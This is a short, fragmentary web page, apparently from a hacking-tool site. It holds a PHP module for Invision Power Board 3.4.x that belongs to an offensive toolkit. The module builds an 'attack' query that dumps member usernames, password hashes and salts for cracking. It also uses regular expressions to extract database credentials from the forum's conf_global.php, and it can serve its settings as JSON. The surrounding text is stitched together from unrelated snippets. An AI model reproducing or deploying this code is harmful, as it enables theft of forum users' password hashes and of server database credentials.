..show you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all if you..
Attempts to find suspicious and evil files or code
<?php
/* Invision Power Board */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "IPB";
$_PROPERTIES['version'] = "3.4.x";
$_PROPERTIES['usernamefield'] = "name";
$_PROPERTIES['emailfield'] = "email";
$_PROPERTIES['hashfield'] = "members_pass_hash";
$_PROPERTIES['saltfield'] = "members_pass_salt";
$_PROPERTIES['tablename'] = "members";
$_PROPERTIES['tableprefix'] = "ipb_";
$_PROPERTIES['filename'] = "ipb/ipba.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename'];
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset($_GET['JSON'])){
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json');
echo json_encode($_PROPERTIES);
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\$INFO\[\'sql_user\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\$INFO\[\'sql_pass\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\$INFO\[\'sql_host\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\$INFO\[\'sql_database\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['file'] = "conf_global.php";
?>